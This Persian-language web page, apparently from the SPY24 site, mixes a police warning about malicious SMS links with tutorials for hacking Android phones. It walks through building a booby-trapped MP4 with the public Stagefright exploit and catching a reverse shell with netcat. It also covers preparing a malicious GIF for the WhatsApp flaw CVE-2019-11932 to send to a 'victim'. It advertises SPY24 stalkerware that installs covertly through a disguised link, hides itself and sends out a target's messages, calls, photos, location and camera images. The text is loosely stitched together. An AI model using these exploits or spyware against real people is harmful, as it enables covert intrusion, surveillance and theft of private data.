بهترین برنامه های هک گوشی اندرویدی آیفون

هک گوشی های اندروید با ارسال لینک

به تازگی اخباری مبنی بر هک گوشی های اندروید با ارسال تصویر PNG پخش … فریم‌ورک اندروید برخورد کرده که هکرها را قادر می‌سازد تا با ارسال یک … هک ارسال لینک هک ارسال لينک

به هیچ عنوان روی لینک‌ های کوتاه شده پیامک‌های ارسالی کلیک نکنید، زیرا خطر هک شدن گوشی موبایل شما از سوی هکرها وجود دارد.

سرهنگ حسن محمدنژاد رئیس پلیس فتا مازندران در گفتگو با خبرنگار گروه استان های باشگاه spy24 از ساری ، گفت: چند وقتی است نفوذگران با سوء استفاده از یک دیتابیس لو رفته از مشخصات مالکان سیم کارت برخی اپراتورها قصد نفوذ و دسترسی کامل به تلفن های همراه هوشمند کاربران را دارند.

وی افزود: هکرها با خطاب کردن نام مالک خط ،اعتماد کاربران را جلب کرده و آنها را برای کلیک روی لینک ارسالی که حاوی یک فایل آلوده است ترغیب می کنند.

سرهنگ حسن محمدنژاد ادامه داد: اگر لینک مورد نظر را باز کنید، یک فایل آلوده به بدافزار برای گوشی اندرویدی با پسوند apk روی گوشی‌ شما دانلود می شود که در صورت نصب، دسترسی از راه دور و کامل به تلفن همراهتان را می دهد.

رئیس پلیس فتا مازندران افزود: لینک های این چنینی تاثیری روی سیستم عامل آی‌او‌اس ندارد و فقط برای سیستم عامل اندروید استفاده می شود. اگر به هر دلیلی روی لینک کلیک کردید و فایل دانلود شده باشد و نصب نکرده باشید مشکلی به وجود نمی آید.

رئیس پلیس فتا مازندران به کاربران هشدار داد به هیچ عنوان و تحت هیچ شرایطی، روی لینک‌های کوتاه شده پیامک‌های ارسالی کلیک نکنید.

هک گوشی های اندروید با ارسال لینک
هک گوشی های اندروید با ارسال لینک 3

نفوذ به اندروید با ارسال ویدیو (MP4)

اموزش نفوذ به اندروید فقط با ارسال یک ویدیو (فرمت MP4) و با استفاده از اسیب پذیری Stagefright با ما در ادامه این اموزش هک و امنیت همراه باشید

نفوذ به اندروید با ارسال ویدیو و امنیت

سیستم عامل اندروید یکی از بهترین و محبوب ترین سیستم عامل های موبایل در جهان است به همین دلیل متخصصان امنیتی زیادی
بر روی امنیت اندروید کار میکنند اما اسیب پذیری هایی وجود دارند که بعد از انتشار اخرین نسخه منتشر میشوند تا هر چه سریع تر نسبت به رفع ان اقدام شود
بسیاری بعد از تهیه دستگاه اندرویدی خود اقدام به اپدیت و رفع این اسیب پذیری ها نمیکنند
یا شرکت های تولید کننده اپدیتی برای دستگاه قدیمی یا جدید ارائه نمیدهند 
پس اسیب پذیری در بسیاری از دستگاه ها باقی میمانند و هکرا با استفاده از ان حفره های امنیتی اقدام به نفوذ میکنند
یکی از این اسیب پذیری های خطرناک به نام Stagefright است که نفوذگر میتواند با ارسال یک ویدیو به کاربر دسترسی کنترل از راه ذور بگیرد 
که در ادامه با نحوه استفاده با این حفذره امنیتی اشنا میشوید
 

اسیب پذیری Stagefright

Stagefright یک حفره امنیتی در سیستم عامل اندرید از نوع باگ RCE است 
که همانطور که گفته شد با اجرای یک فایل ویدیو ای با پسورند .mp4 دسترسی کنترل از راه دور به نفوذگر میدهد
اکسپلویت این اسیب پذیری به صورت عمومی منتشر شده است و میتواند اندروید ۵٫۰ < 5.1.1 را مورد نفوذ قرار دهد
میتوانید فایل اکسپلویت را از اخر اموزش به صورت مستقیم دانلود کنید یا از سایت exploit-db.com دریافت کنید
نکته : در این اموزش برای نفوذ به اندروید از لینوکس استفاده میکنیم اما میتوانید با نصب پایتون در هر سیستم عاملی مانند ویندوز استفاده کنید
وارد ترمینال شوید و به مسیری که فایل پایتون اکسپلویت را قرار داده اید بروید
حال اکسپلویت را اجرا کنید تا سویچ ها و راهنمای ان را ببینید

python 38124.py

هک گوشی های اندروید
هک ارسال لینک

ساخت فایل الوده MP4

حال برای ساخت فایل ویدیو ای الوده به دستور زیر توجه کنید

python 38124.py -c 127.0.0.1 -p 6060 -o spy24.mp4


با استفاده از python فایل اکسپلویت ۳۸۱۲۴٫py را اجرا کرده ایم 
با سویچ -c ادرس ip سرور خود که میخواهید اتصال دستگاه کلاینت به ان برقرار شود را وارد کنید
یک پورت شبکه را برای اتصال به دلخواه انتخاب کنید ما با استفاده از سویچ -p پورت ۶۰۶۰ را انتخاب کرده ایم
و برای گرفتن خروجی سویچ -o را وارد کنید و سپس نام فایل را با فرمت .mp4 وارد کنید
که ما PentestCore.mp4 وارد کرده ایم این فایل خروجی است که باید به کلاینت خود بدهید تا اجرا کنید
بعد از اجرا فایل ساخته شده توسط کاربر نفوذ به اندروید انجام شده و اتصال به سرور شما بر قرار میشود 
برای برقراری این اتصال باید پورت ۶۰۶۰ را که انتخاب کرده بودید در سرور خود باز کنید و منتظر اجرای ویدیو توسط کلاینت شوید 
NC ابزاری مناسب برای باز کردن پورت است که در کالی لینوکس به صورت پیشفرض وجود دارد 
میتوانید اموزش استفاده از نت کت (nc) را در PentestCore مشاهده کنید
در nc را با سویچ های زیر اجرا کنید تا پروت مورد نظر شما بر روی سیسستم باز شود

nc -v -l -p 6060


بعد از اجرای فایل ویدو ای دستگاه به صورت ریموت به سرور شما از طریق nc متصل میشود و میتوانید دستورات خود را بر روی دستگاه وارد کنید.

  • هک گوشی های اندروید
  • هک ارسال لینک

هک اندروید با فرستادن لینک

امروزه واژه ی هک به یکی از پرکاربردترین واژه ها در دنیای تکنولوژی تبدیل شده است. افراد زیادی به دنبال روش های هک و نفوذ به دستگاه های هوشمند هستند و در مقابل نیز کسانی وجود دارند که در پی یافتن راهی برای جلوگیری ازهک شدن می باشند. اما در این بین روش های زیادی برای هک دستگاه های مختلف از جمله گوشی ها وجود دارد. یکی از این روش ها که شاید توجه کمتری به آن شده باشد، هک گوشی با لینک می باشد. هک گوشی با لینک یکی از روش هایی است که هکرهای حرفه ای بسیار از آن استفاده می کنند، اما متاسفانه افرادی که می خواهند از هک دستگاه های خود جلوگیری کنند، توجه کمتری به لینک هایی که روی آن کلیک می کنند، دارند. از همین رو در این مطلب قصد داریم به طور مفصل درباره روش هک گوشی با لینک های آلوده صحبت کنیم و به بررسی نحوه شناسایی آنها و معرفی نرم افزاری برای هک به این روش بپردازیم.

لینک آلوده چیست؟

به طور کلی در دنیای اینترنت و وب، به هر سورس یا گزینه ای که در یک صفحه، داکیومنت، سرویس یا برنامه اینترنتی وجود داشته باشد که اجازه دهد کاربر با استفاده از آن، به صفحه، داکیومنت، سرویس یا برنامه اینترنتی دیگری متصل شود، لینک گفته می شود. به عبارت ساده تر، در صورتی شما در یک صفحه اینترنتی روی یک گزینه کلیک کنید و به صفحه دیگری هدایت شوید، در واقع شما روی یک لینک کلیک کرده اید.

لینک ها بسیار متنوع هستند و می توانند شامل دانلود ها، نمایش ویدیو، پخش موزیک، اجرای برنامه ها، نمایش صفحات و موارد دیگری از این قبیل شوند. بنابراین لینک ها نقش پر رنگی در ایجاد ارتباط در اینترنت دارند و بدون آن ها اینترنت معنای امروزی خود را نخواهد داشت.

در صورتی که شما بدون داشتن برنامه های محافظت کننده، مانند آنتی ویروس ها یا فایروال ها وارد فضای اینترنت شوید و به سایت های مختلف سر بزنید، احتمال این که دستگاه شما به ویروس یا بدافزارها آلوده شود بسیار زیاد است. این بدافزارها و ویروس ها معمولا از طریق لینکهای آلوده ای که شما برروی آنها کلیک می کنید، به سیستمتان منتقل می شوند.

لینک های آلوده نیز کاملا مشابه لینک های مفید موجود در اینترنت بوده و تفاوت چندانی با آن ها ندارند. یک لینک آلوده می تواند در هر شکل و شمایلی در اینترنت وجود داشته باشد. از همین رو شناسایی لینک های آلوده از لینک های مفید امر چندان ساده ای نیست. اصولا لینک های آلوده به مجموعه لینک هایی گفته می شود که کاربر را به مسیری هدایت می کنند که منجر به آسیب رساندن به او و آلوده شدن سیستم وی به ویروس ها و بد افزار ها می شود.

هدف از ساخت لینک های آلوده چیست؟

اما سوالی که ممکن است در ذهن کاربران ایجاد شود، این است که هدف از ساخت لینک های آلوده چیست و چرا چنین لینک های مخربی در محیط اینترنت وجود دارند؟ در پاسخ به این سوال باید گفت که برای ساخت یک لینک آلوده اهداف زیادی وجود دارد که از جمله آن ها می توان به انتشار ویروس ها، انتشار بد افزار ها، بدست آوردن اطلاعات، هک و نفوذ به سیستم ها و مواردی از این دست، اشاره کرد. معمولا ویروس ها و بدافزارها با اهداف مالی و توسط گروه های برنامه نویسان که بعضا سازندگان آنتی ویروس ها هم هستند، انتشار می یابند. اما لینک هایی که با هدف هک و نفوذ به سیستم های دیگران در اختیار کاربران قرار می گیرند، توسط هکرها ساخته می شوند و می توانند اهداف زیادی را دنبال کنند.

هک گوشی با لینک آلوده

یکی از روش های هک گوشی و یا سیستم های رایانه ای، ترغیب کاربر قربانی به کلیک بر روی لینک های آلوده می باشد. در این روش، هکر با استفاده از روش هایی که به مهندسی اجتماعی مشهور است، اقدام به جذب کاربر برای کلیک روی لینک آلوده می کند. به طور مثال هکر با وعده هایی همچون نمایش فیلمی مخفی از افراد مشهور یا وعده ی شرکت در قرعه کشی بزرگ، برای قربانی به نوعی دام پهن می کند و از آن طریق او را مجاب می کند که روی لینک مخرب کلیک نماید. پس از کلیک روی این لینک برنامه ای در پشت پرده اقدام به سرقت اطلاعات هدف خواهد نمود و به این ترتیب هک گوشی با لینک انجام می شود.

همانطور که متوجه شدید برای این که بتوانید شخصی را با استفاده از یک لینک هک کنید، آن لینک باید حاوی یک برنامه یا نرم افزاری باشد که قابلیت ارسال اطلاعات را به طور مخفی به شما بدهد.

برای این کار نرم افزارها یا تروجان های زیادی وجود دارد، که یکی از موفق ترین آنها در این زمینه نرم افزار SPY24 می باشد. این نرم افزار در نسخه های مختلف ارائه شده است که در آخرین نسخه قابلیت ارسال لینک را در اختیار کاربران خود قرار داده است. به این شکل که شما با ارسال لینک برنامه با آیکون دلخواه خود مثلا تلگرام بدون فیلترشکن برای شخص موردنظرتان از او می خواهید که برروی لینک کلیک نماید و به محض کلیک هدف بر روی لینک، برنامه به طور خودکار نصب شده و سپس از لیست برنامه های موبایل پنهان می شود تا شخص موردنظر متوجه عملکرد این برنامه نشود.

پس از نصب، برنامه شروع به ارسال تمام اطلاعات موجود در گوشی موبایل هدف برای شما می کند، اطلاعاتی مانند لیست پیامکهای ارسالی و دریافتی، لیست تماس ها، شنود مکالمات، تصاویر موجود در گالری، موقعیت مکانی لحظه به لحظه و مشاهده تصاویر اطراف توسط دوربین گوشی هدف.

برای دانلود و دریافت فیلم آموزش نصب این برنامه می توانید برروی لینک قرمز رنگ زیر کلیک نمایید.

نرم افزار SPY24

توجه داشته باشید که برنامه spy24 توسط سامانه کنترل فرزند ساخته شده و این سامانه تنها به جهت فرهنگ سازی و نظارت بر خانواده می باشد و استفاده های غیره، از نظر قوانین این سامانه و قوانین جمهوری اسلامی ایران غیرقانونی می باشد.

در مطالب گذشته راجب هک کردن گوشی اندروید صحبت کردیم ، اما روش هایی که گفتیم بیشترش استفاده از فایل مخرب APK بود و خیلی از دوستان سوال پرسیدن بودن آیا روش های دیگری هم برای هک کردن گوشی اندروید وجود داره؟ قطعا وجود داره ولی اگر شما بخواهید حملات حرفه ای تری رو انجام بدید نیازمند دانش بالایی در این زمینه هستید ، یکی از روش هایی که خیلی برای نفوذ به گوشی اندروید ازش استفاده میشه فایل مخرب APK هست اما به دلیل استفاده خیلی زیاد از این روش کاربران نسبت به این حمله مقاوم شده اند و به راحتی نمیتونید فایل مخرب APK خودتون رو به قربانی بدید و اون به راحتی نصب کنه ، پس ما باید روش نفوذمون رو تغییر بدیم ، یکی از راه ها استفاده از آسیب پذیری هایی هست که برای سیستم عامل اندروید منتشر میشه که من راجب یکی از این آسیب پذیری ها به اسم StageFright در سایت صحبت کرده بودم که به لطف دوستان فیلترینگ مجبور شدیم پست رو از روی سایت حذف کنیم ، آسیب پذیری StageFright این اجازه رو به ما میداد تا از طریق فایل MP4 به گوشی اون شخص نفوذ کنیم که تو زمان خودش بی نظیر بود ، شاید خیلی ها بگن عجب روشی بوده که باید بگم روش خوبی بود ولی از اون بهترش هم هست ? پس با ما همراه باشید تا از طریق فایل gif و فرستادنش از طریق واتس اپ برای قربانی به گوشیش دسترسی بگیریم.

توضیحی راجب آسیب پذیری واتس اپ (Whats App) :

آسیب پذیری به وجود آمده در واتس با شناسه CVE-2019-11932 دردسترس هست ، این آسیب پذیری از نوع double free vulnerability است که به ما امکان اجرا دستور دلخواه برروی سیستم عامل اندروید رو میده که ما با ارسال یک فایل gif در واتس اپ و اجرای اون توسط قربانی ما میتونیم به گوشی قربانی دسترسی بگیریم. این آسیب پذیری برروی نسخه واتس اپ ۲٫۱۹٫۲۴۴ به پایین کار میکنه و برروی نسخه های بالاتر این آسیب پذیری رفع شده است.

خب خیلی حرف زدم بهتره بریم سراغ کارمون ? در اولین قدم من با دستور زیر اکسپلویت این آسیبپ پذیری رو دانلود میکنم

بعد از دانلود اکسپلویت وارد پوشه اکسپلویت میشیم و دستور make رو وارد میکنیم تا فایل های مورد نیاز ما رو کامپایل کنه که البته شما  با دستور زیر هم میتونید اینکار رو انجام بدید

gcc -o exploit egif_lib.c exploit.c

در این مرحله ما نیاز به یه فایل gif داریم که به دلخواه یک فایل gif رو انتخاب میکنیم که قراره این فایل gif رو به اکسپلویت بدیم تا تغییرات رو انجام بده و آماده استفاده بشه ، من از قبل یه فایل gif رو از اینترنت دانلود کردم و با دستور زیر فایل gif رو به اکسپلویت معرفی میکنم

خب الان فایل gif ما آمادست با دستور زیر ما ابزار NC رو روی حالت Listener میبریم تا بعد از اجرای gif توسط قربانی دسترسی ما به گوشی برقرار بشه

کافیه فایل gif خودمون رو از طریق واتس اپ برای قربانی ارسال کنیم

خب بعد از ارسال فایل gif منتظر میمونیم قربانی فایل gif رو اجرا کنه و بعد از اجرا دسترسی ما به گوشی برقرار میشه

امیدوارم که از این آموزش لذت کافی رو برده باشید اگر سوالی راجب این مطلب داشتید از بخش دیدگاه ها با ما در میان بزارید…

هک گوشی های اندرویدی با ارسال تصویر PNG

تا به امروز روش‌های زیادی برای نفوذ به گوشی‌های هوشمند دیده‌ایم، اما جالب ‌تر اینجا است که بگوییم به تازگی هک گوشی های اندرویدی با ارسال تصویر PNG به آن‌ها امکان ‌پذیر شده است.

یک راه برای جلوگیری از هک نشدن گوشی موبایل این است که به سادگی از کلیک بر روی لینک‌های ناآشنا به منظور نصب اپلیکیشن اجتناب کنید. به تازگی اخباری مبنی بر هک گوشی های اندرویدی با ارسال تصویر PNG پخش شده است. متاسفانه امروزه هکرها به طرز ماهرانه‌ای قادر هستند بدافزارهای خود را در قالب فایل‌های به ظاهر بی‌خطر نظیر فایل تصویری PNG پنهان کنند. آن‌ها از آسیب‌پذیری این فایل برای رسیدن به اهداف شوم خود و نفوذ به گوشی اندرویدی استفاده می‌کنند.

همچنین بخوانید: هک اندروید با فرستادن لینک

  • به گفته محققان، گوشی های اندرویدی در برابر حملات هکرها بسیار آسیب پذیرند هک اندروید

کمپانی گوگل در تازه‌ترین بروزرسانی امنیتی خود یعنی در ماه فوریه، به نوع جدیدی از آسیب‌پذیری فریم‌ورک اندروید برخورد کرده که هکرها را قادر می‌سازد تا با ارسال یک فایل تصویری PNG، به گوشی‌های اندرویدی کاربران نفوذ کنند. آن‌ها این فایل تصویری را به طرز استادانه‌ای ساخته‌اند تا پس از باز شدن آن توسط کاربران قربانی به راحتی به گوشی‌های هوشمند نفوذ کرده و کدهای مخرب خود را با دسترسی سطح بالاتر به اجرا درآورند.

خوشبختانه کمپانی گوگل ادعا کرده که تاکنون هیچ گزارشی در مورد این نوع هک از سوی کاربران اعلام نشده، بنابراین انتظار می‌رود که هکرها هنوز به این شکاف امنیتی پی نبرده‌اند.

کمپانی گوگل پس از مواجه با این نقص امنیتی، در آخرین بروزرسانی امنیتی اندروید این مشکل را برطرف کرد. همچنین اظهار داشت که به منظور عدم سو استفاده هکرها از این قضیه و امکان هک دستگاه‌هایی که تاکنون بروزرسانی نشده‌اند، از ارائه جزئیات بیشتر در مورد این آسیب‌پذیری خودداری خواهد کرد. بنابراین اگر هنوز گوشی‌های هوشمند خود را بروزرسانی نکرده‌اید، اکنون وقت آن رسیده که دست به کار شوید. البته، لازم به ذکر است که این مسئله مهم، شامل سیستم عامل‌های قدیمی اندروید نمی‌شود و تنها اندروید 7 نوقا، اندروید 8 اوریو و در نهایت اندروید 9 پای را درگیر خود کرده است.


برنامه SPY24 :

که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت SPY24 بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.

در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:

  • نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
  • گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
  • موقعیت لحظه مستمر و مسیر های پیموده شده
  • وب سایت های بازدید شده و برنامه های اجرا شده
  • با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
  • امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور


keleis andre

برنامه ردیابی و کنترل نامحسوس گوشی موبایل و تبلت از راه دور

یک دیدگاه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا